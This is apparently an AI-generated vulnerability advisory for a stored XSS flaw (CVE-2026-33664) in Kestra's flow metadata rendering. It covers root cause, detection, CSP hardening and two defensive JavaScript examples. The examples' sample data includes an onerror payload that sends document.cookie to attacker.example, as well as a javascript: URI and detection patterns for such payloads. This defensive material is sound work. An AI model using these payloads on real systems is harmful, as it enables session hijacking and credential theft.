CVE-2026-33664 Overview
CVE-2026-33664 is a stored Cross-Site Scripting (XSS) vulnerability affecting Kestra, an open-source, event-driven orchestration platform. Versions up to and including 1.3.3 render user-supplied flow YAML metadata fields—specifically description, inputs[].displayName, and inputs[].description—through the Markdown.vue component instantiated with html: true. The resulting HTML is injected into the DOM via Vue's v-html directive without any sanitization, allowing a flow author to embed arbitrary JavaScript that executes in the browser of any user who views or interacts with the flow.
This vulnerability is distinct from GHSA-r36c-83hm-pc8j / CVE-2026-29082, which covers only FilePreview.vue rendering .md files from execution outputs. The present finding affects different components and different data sources, and requires significantly less user interaction: the inputs[].displayName injection point is zero-click.
Critical Impact
Authenticated attackers with flow authoring permissions can execute arbitrary JavaScript in victim browsers, potentially leading to session hijacking, credential theft, privilege escalation, and further compromise of the Kestra orchestration environment.
Affected Products
- Kestra versions up to and including 1.3.3
- Kestra Markdown.vue component with html: true configuration
- Any Kestra deployment on an affected version where more than one user can author or modify flows (the attacker needs flow-authoring rights; every UI user who opens the flow is a potential victim)
Discovery Timeline
- 2026-03-26 - CVE-2026-33664 published to NVD
- 2026-03-26 - Last updated in NVD database
Technical Details for CVE-2026-33664
Vulnerability Analysis
The vulnerable code is in Kestra's frontend Vue.js components that render flow YAML metadata. The description, inputs[].displayName and inputs[].description fields are stored with the flow when an author saves it and passed to the Markdown.vue component each time the flow is displayed. The component is configured with html: true, so raw HTML in those fields passes through the Markdown parser unescaped.
The rendered string is then bound into the DOM with Vue's v-html directive, which assigns it to innerHTML without sanitization. The result is a classic stored XSS: a payload embedded in flow metadata persists in the application and runs in the browser of every user who views the affected flow.
The inputs[].displayName injection point is the most concerning, because it is rendered as soon as the page showing the flow loads; no click or other interaction is needed, which makes that vector zero-click.
Root Cause
The root cause is the combination of two insecure practices:
Unsafe Markdown Configuration: The Markdown.vue component is instantiated with html: true, which permits raw HTML tags to pass through the Markdown renderer unescaped.
Missing Output Sanitization: The rendered output is bound to the DOM via Vue's v-html directive without any HTML sanitization library (such as DOMPurify) processing the content first.
Together these let any HTML that the browser executes on insertion reach the page: event-handler attributes (for example onerror on an <img>, onload on an <svg>), javascript: URIs in href attributes, and similar vectors. A bare <script> element is not needed and would not even run, since browsers do not execute script elements inserted through innerHTML; the payloads that matter are the attribute-based ones.
Attack Vector
The attack requires network access and low-privilege authentication (flow authoring permissions). An attacker would craft a malicious flow definition containing JavaScript payloads in the vulnerable YAML metadata fields. When victims browse to the affected flow through the Kestra UI, the malicious script executes in their browser context.
Exploitation scenarios include:
- Session Hijacking: Stealing session tokens or authentication cookies to impersonate victims
- Credential Harvesting: Injecting fake login forms or keyloggers to capture user credentials
- Privilege Escalation: Using administrator sessions to escalate attacker privileges
- Data Exfiltration: Accessing sensitive flow configurations, secrets, or execution outputs visible to the victim
- Lateral Movement: Leveraging the orchestration platform to pivot to connected systems
No verified proof-of-concept code is publicly available; the GitHub Security Advisory is the authoritative source for technical details.
Detection Methods for CVE-2026-33664
Indicators of Compromise
- Flow YAML files containing HTML tags or JavaScript code in description, inputs[].displayName, or inputs[].description fields
- Unusual script execution or external resource loading observed in browser developer tools when viewing flows
- Unexpected outbound network connections from user browsers to attacker-controlled domains
- Audit logs showing flow modifications with suspicious metadata content
Detection Strategies
- Implement Content Security Policy (CSP) headers to detect and block inline script execution attempts
- Monitor flow modification events for metadata containing HTML tags, <script>, event handlers, or javascript: URIs
- Deploy a WAF or request-inspection layer in front of the flow create/update API to flag payload patterns, but scope the rules to the metadata fields: flow YAML legitimately contains angle brackets, colons and quotes, so matching the whole request body produces noise
- Review Kestra audit logs for flow creations or updates from unusual sources or containing suspicious patterns
Monitoring Recommendations
- Enable verbose logging for flow creation and modification operations in Kestra
- Configure alerting on CSP violation reports that may indicate XSS exploitation attempts
- Implement regular automated scanning of flow definitions for potentially malicious content
- Monitor for anomalous API calls or data access patterns that may indicate compromised user sessions
How to Mitigate CVE-2026-33664
Immediate Actions Required
- Restrict flow authoring permissions to trusted users only until a patch is available
- Review existing flows for suspicious HTML or JavaScript content in metadata fields
- Implement strict Content Security Policy headers to mitigate XSS impact
- Consider deploying a reverse proxy or WAF with XSS filtering capabilities in front of the Kestra UI
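The indicators and monitoring items above, and the "review existing flows" action here, all come down to the same check: look at the three metadata fields the advisory names and flag anything a browser would treat as markup or script. The following is an added example written for this page, not Kestra project code. It takes a flow as a plain object (JSON from the flows API, or a YAML flow file loaded with a YAML parser of your choice; none is bundled), and the sample flows it ships with are constructed, including the attacker.example host.

```javascript
// Added example (not Kestra project code): triage parsed Kestra flow definitions
// for HTML/JavaScript in the metadata fields this advisory names. The input is the
// flow as a plain object: JSON from the flows API, or a YAML flow file loaded with
// a YAML parser of your choice (no YAML parser is bundled here).
"use strict";

// Heuristic patterns. A browser starts a tag at "<" followed by a letter, "!", "?"
// or "/", so a bare "a < b" does not trip the first rule. Event handlers are only
// flagged inside a tag to keep false positives down; treat hits as triage input.
const RULES = [
  { rule: "html-tag",       re: /<\/?[a-z!?][^>]*>/i },
  { rule: "script-tag",     re: /<script\b/i },
  { rule: "event-handler",  re: /<[^>]*\bon[a-z]+\s*=/i },
  { rule: "javascript-uri", re: /javascript\s*:/i },
  { rule: "data-html-uri",  re: /data\s*:\s*text\/html/i },
];

// The three fields the advisory says reach Markdown.vue with html: true.
function renderedFields(flow) {
  const fields = [["description", flow.description]];
  (Array.isArray(flow.inputs) ? flow.inputs : []).forEach((input, i) => {
    if (input && typeof input === "object") {
      fields.push([`inputs[${i}].displayName`, input.displayName]);
      fields.push([`inputs[${i}].description`, input.description]);
    }
  });
  return fields;
}

function scanFlow(flow) {
  const findings = [];
  for (const [path, value] of renderedFields(flow)) {
    if (typeof value !== "string") continue;
    for (const { rule, re } of RULES) {
      const m = re.exec(value);
      if (m) {
        findings.push({
          flow: `${flow.namespace}/${flow.id}`,
          path,
          rule,
          sample: m[0].slice(0, 80), // enough to eyeball, not the full payload
        });
      }
    }
  }
  return findings;
}

// Scan a JSON array of flows (e.g. the saved response of a flows API listing).
function scanFlowsJson(json) {
  return JSON.parse(json).flatMap(scanFlow);
}

// Constructed sample data, not real flows: one clean flow and one whose input
// metadata carries an onerror handler and a javascript: link.
const SAMPLE_FLOWS_JSON = JSON.stringify([
  {
    id: "nightly-etl", namespace: "prod",
    description: "Loads the *nightly* extract when a < b. Owner: data-eng.",
    inputs: [{ id: "date", type: "STRING", displayName: "Run date", description: "YYYY-MM-DD" }],
  },
  {
    id: "helper", namespace: "prod",
    description: "Utility flow",
    inputs: [{
      id: "x", type: "STRING",
      displayName: "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
      description: "[docs](javascript:alert(document.domain))",
    }],
  },
]);

for (const f of scanFlowsJson(SAMPLE_FLOWS_JSON)) console.log(JSON.stringify(f));
```

Run it over a full export of flows once to clean up what is already stored, and again on every flow create/update event (the audit log entries mentioned above) so a new payload is flagged as soon as it is saved. The rules are deliberately loose; a hit means a human should read the field, not that exploitation is confirmed.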
Patch Information
As of the publication date (2026-03-26), it is unclear if a patch is available from Kestra. The affected-version statement (up to and including 1.3.3) implies a fix in the release that follows, but confirm the fixed version against the GitHub Security Advisory before upgrading.
When a patch becomes available, upgrade Kestra to the fixed version immediately. A correct fix involves one or more of:
- Configuring the Markdown renderer with html: false, so raw HTML in the source is escaped and shown as text rather than passed through
- Running the rendered output through an HTML sanitization library such as DOMPurify before DOM insertion
- Using Vue's text interpolation instead of v-html for untrusted content, at the cost of losing Markdown formatting for that field
Workarounds
- Enforce strict access controls limiting who can create or modify flows
- Implement a review process for all flow changes that includes metadata inspection
- Deploy Content Security Policy headers with restrictive script-src directives
- Consider sanitizing flow metadata at the API layer before storage
# Example Content Security Policy header for nginx; add it to the server or location block that serves the Kestra UI.
# script-src 'self' blocks the inline event handlers and javascript: URIs this bug relies on; connect-src and img-src 'self' limit exfiltration.
# Test against the UI in staging first: a build that needs inline scripts or 'unsafe-eval' will break under this policy.
# report-uri is what makes the violation reports referenced above arrive; /csp-report is a placeholder for a collector you run.
# nginx stops inheriting add_header from the outer block as soon as a location declares its own, so check the effective headers.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; frame-ancestors 'self'; report-uri /csp-report;" always;
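The monitoring recommendations above suggest alerting on CSP violation reports, and the header above only produces those if a report-uri or report-to directive points at an endpoint you operate. What arrives there needs triage: browser extensions trip inline-script violations all the time, but an inline-script or event-handler violation on a page that renders flow metadata is exactly what exploitation of this bug looks like under a script-src 'self' policy. The classifier below is an added example written for this page, not Kestra project code. It is framework-agnostic (takes the raw request body as text, returns the status to answer with and the findings to log), handles both the legacy report-uri body and the Reporting API body, and assumes the Kestra UI serves flow pages under /ui/flows/ (adjust FLOW_PAGE_PREFIX to your deployment). The sample reports are constructed, not captured.

```javascript
// Added example (not Kestra project code): classify incoming CSP violation reports
// so alerting has something concrete to key on. Wire handleCspReport() to whatever
// endpoint your report-uri / report-to directive points at.
"use strict";

// Kestra UI route prefix that renders flow metadata (assumed; adjust to your deployment).
const FLOW_PAGE_PREFIX = "/ui/flows/";

// Accept both wire formats: the legacy report-uri body {"csp-report": {...}} and
// the Reporting API (report-to) body, an array of {type: "csp-violation", body: {...}}.
function normalizeReports(payload) {
  if (payload && typeof payload === "object" && payload["csp-report"]) {
    const r = payload["csp-report"];
    return [{
      documentUrl: r["document-uri"] || "",
      directive: r["effective-directive"] || r["violated-directive"] || "",
      blockedUrl: r["blocked-uri"] || "",
      sample: r["script-sample"] || "",
      disposition: r["disposition"] || "enforce",
    }];
  }
  if (Array.isArray(payload)) {
    return payload
      .filter((e) => e && e.type === "csp-violation" && e.body)
      .map((e) => ({
        documentUrl: e.body.documentURL || "",
        directive: e.body.effectiveDirective || "",
        blockedUrl: e.body.blockedURL || "",
        sample: e.body.sample || "",
        disposition: e.body.disposition || "enforce",
      }));
  }
  return [];
}

function pathOf(url) {
  try { return new URL(url).pathname; } catch { return ""; }
}

// Severity: a blocked inline script, event handler or javascript: URI on a flow
// page is the signature of this bug being exploited under a script-src 'self'
// policy. Script violations elsewhere still deserve a look (extensions are the
// usual benign cause); other directives are low unless they pile up.
function classify(v) {
  const onFlowPage = pathOf(v.documentUrl).startsWith(FLOW_PAGE_PREFIX);
  const scriptDirective = v.directive.startsWith("script-src");
  const inline = v.blockedUrl === "inline" || v.blockedUrl === "eval";
  let severity = "low";
  let reason = `${v.directive || "unknown"} violation`;
  if (scriptDirective && inline) {
    severity = onFlowPage ? "high" : "medium";
    reason = "inline script, event handler or javascript: URI blocked";
  } else if (scriptDirective) {
    severity = onFlowPage ? "high" : "medium";
    reason = `external script blocked: ${v.blockedUrl}`;
  }
  return {
    severity, reason, onFlowPage,
    enforced: v.disposition === "enforce",   // false under Content-Security-Policy-Report-Only
    documentUrl: v.documentUrl, directive: v.directive,
    sample: v.sample.slice(0, 120),          // only present if script-src has 'report-sample'
  };
}

// Entry point for the HTTP handler: malformed bodies get 400, valid ones 204.
function handleCspReport(bodyText) {
  let payload;
  try { payload = JSON.parse(bodyText); } catch { return { status: 400, findings: [] }; }
  return { status: 204, findings: normalizeReports(payload).map(classify) };
}

// Constructed sample reports (not captured from a real deployment).
const SAMPLE_LEGACY_REPORT = JSON.stringify({ "csp-report": {
  "document-uri": "https://kestra.example/ui/flows/edit/prod/helper",
  "effective-directive": "script-src-attr",
  "violated-directive": "script-src-attr",
  "blocked-uri": "inline",
  "disposition": "enforce",
  "script-sample": "fetch('https://attacker.example/?c='+document.cookie)",
} });
const SAMPLE_REPORT_TO = JSON.stringify([{ type: "csp-violation", body: {
  documentURL: "https://kestra.example/ui/executions",
  effectiveDirective: "style-src-elem",
  blockedURL: "inline",
  disposition: "report",
} }]);

for (const f of handleCspReport(SAMPLE_LEGACY_REPORT).findings) console.log(JSON.stringify(f));
```

Add 'report-sample' to script-src if you want the sample field populated; with it, the report carries the first bytes of the blocked script, which is usually enough to tell an extension's injected helper from a document.cookie exfiltration. Roll the policy out in Report-Only mode first and watch the enforced flag: the same classifier works for both, and the baseline of "low" and extension-caused "medium" findings you collect during that period is what you tune alert thresholds against.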
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

